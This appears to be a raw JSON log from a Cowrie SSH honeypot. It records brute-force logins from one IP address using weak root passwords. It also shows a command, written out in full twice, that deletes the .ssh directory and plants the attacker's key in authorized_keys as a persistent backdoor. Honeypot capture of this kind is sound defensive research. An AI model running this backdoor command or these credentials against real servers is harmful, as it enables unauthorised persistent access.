{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:32:04.987995Z","src_ip":"212.227.235.229","session":"33d627bfba49"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58668,"dst_ip":"1.2.3.4","dst_port":22,"session":"12e463b72837","protocol":"ssh","message":"New connection: 212.227.235.229:58668 (1.2.3.4:22) [session: 12e463b72837]","sensor":"my-vps","timestamp":"2025-09-09T06:32:05.336386Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:32:05.418350Z","src_ip":"212.227.235.229","session":"12e463b72837"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:32:05.782856Z","src_ip":"212.227.235.229","session":"12e463b72837"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44856,"dst_ip":"1.2.3.4","dst_port":22,"session":"41a7f853f87e","protocol":"ssh","message":"New connection: 212.227.235.229:44856 (1.2.3.4:22) [session: 41a7f853f87e]","sensor":"my-vps","timestamp":"2025-09-09T06:32:06.160089Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:32:06.161275Z","src_ip":"212.227.235.229","session":"41a7f853f87e"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:32:06.403040Z","src_ip":"212.227.235.229","session":"41a7f853f87e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:32:07.298545Z","src_ip":"212.227.235.229","session":"12e463b72837"}
{"eventid":"cowrie.login.success","username":"root","password":"Admin123!","message":"login attempt [root/Admin123!] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:32:07.412238Z","src_ip":"212.227.235.229","session":"41a7f853f87e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:32:07.952124Z","src_ip":"212.227.235.229","session":"41a7f853f87e"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:32:07.952792Z","src_ip":"212.227.235.229","session":"41a7f853f87e"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:32:07.953836Z","src_ip":"212.227.235.229","session":"41a7f853f87e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:32:08.437213Z","src_ip":"212.227.235.229","session":"41a7f853f87e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:32:08.760768Z","src_ip":"212.227.235.229","session":"41a7f853f87e"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:32:08.761828Z","src_ip":"212.227.235.229","session":"41a7f853f87e"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:32:08.816254Z","src_ip":"212.227.235.229","session":"12e463b72837"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:32:09.006363Z","src_ip":"212.227.235.229","session":"41a7f853f87e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:32:09.007341Z","src_ip":"212.227.235.229","session":"41a7f853f87e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59462,"dst_ip":"1.2.3.4","dst_port":22,"session":"abc719617a66","protocol":"ssh","message":"New connection: 212.227.235.229:59462 (1.2.3.4:22) [session: abc719617a66]","sensor":"my-vps","timestamp":"2025-09-09T06:32:09.181758Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:32:09.182971Z","src_ip":"212.227.235.229","session":"abc719617a66"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45830,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f2f51e690ca","protocol":"ssh","message":"New connection: 212.227.235.229:45830 (1.2.3.4:22) [session: 0f2f51e690ca]","sensor":"my-vps","timestamp":"2025-09-09T06:32:09.246213Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:32:09.246912Z","src_ip":"212.227.235.229","session":"0f2f51e690ca"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:32:09.487744Z","src_ip":"212.227.235.229","session":"0f2f51e690ca"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:32:09.551311Z","src_ip":"212.227.235.229","session":"abc719617a66"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:32:10.492860Z","src_ip":"212.227.235.229","session":"0f2f51e690ca"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:32:11.186137Z","src_ip":"212.227.235.229","session":"abc719617a66"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":63795,"dst_ip":"1.2.3.4","dst_port":22,"session":"77420c48d1a3","protocol":"ssh","message":"New connection: 212.227.235.229:63795 (1.2.3.4:22) [session: 77420c48d1a3]","sensor":"my-vps","timestamp":"2025-09-09T06:32:11.271761Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:32:11.272685Z","src_ip":"212.227.235.229","session":"77420c48d1a3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:32:11.383467Z","src_ip":"212.227.235.229","session":"77420c48d1a3"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:32:11.568830Z","src_ip":"212.227.235.229","session":"abc719617a66"}
{"eventid":"cowrie.session.closed","duration":"10.7","message":"Connection lost after 10.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:32:11.569836Z","src_ip":"212.227.235.229","session":"33d627bfba49"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:32:11.735061Z","src_ip":"212.227.235.229","session":"0f2f51e690ca"}
{"eventid":"cowrie.login.failed","username":"webguest","password":"2025","message":"login attempt [webguest/2025] failed","sensor":"my-vps","timestamp":"2025-09-09T06:32:11.867874Z","src_ip":"212.227.235.229","session":"77420c48d1a3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46696,"dst_ip":"1.2.3.4","dst_port":22,"session":"a079323038b4","protocol":"ssh","message":"New connection: 212.227.235.229:46696 (1.2.3.4:22) [session: a079323038b4]","sensor":"my-vps","timestamp":"2025-09-09T06:32:11.981760Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:32:11.982816Z","src_ip":"212.227.235.229","session":"a079323038b4"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:32:12.227844Z","src_ip":"212.227.235.229","session":"a079323038b4"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:32:12.980438Z","src_ip":"212.227.235.229","session":"77420c48d1a3"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:32:13.250716Z","src_ip":"212.227.235.229","session":"a079323038b4"}
{"eventid":"cowrie.session.closed","duration":"7.3","message":"Connection lost after 7.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:32:13.494174Z","src_ip":"212.227.235.229","session":"41a7f853f87e"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:32:13.496943Z","src_ip":"212.227.235.229","session":"a079323038b4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33184,"dst_ip":"1.2.3.4","dst_port":22,"session":"e18a70cbade1","protocol":"ssh","message":"New connection: 212.227.235.229:33184 (1.2.3.4:22) [session: e18a70cbade1]","sensor":"my-vps","timestamp":"2025-09-09T06:32:25.189034Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:32:25.191821Z","src_ip":"212.227.235.229","session":"e18a70cbade1"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:32:25.565974Z","src_ip":"212.227.235.229","session":"e18a70cbade1"}
{"eventid":"cowrie.login.success","username":"root","password":"Password321","message":"login attempt [root/Password321] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:32:27.206420Z","src_ip":"212.227.235.229","session":"e18a70cbade1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:32:27.987560Z","src_ip":"212.227.235.229","session":"e18a70cbade1"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:32:27.988284Z","src_ip":"212.227.235.229","session":"e18a70cbade1"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:32:27.989290Z","src_ip":"212.227.235.229","session":"e18a70cbade1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.8","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:32:28.815356Z","src_ip":"212.227.235.229","session":"e18a70cbade1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:32:29.260173Z","src_ip":"212.227.235.229","session":"e18a70cbade1"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:32:29.260831Z","src_ip":"212.227.235.229","session":"e18a70cbade1"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:32:29.654904Z","src_ip":"212.227.235.229","session":"e18a70cbade1"}
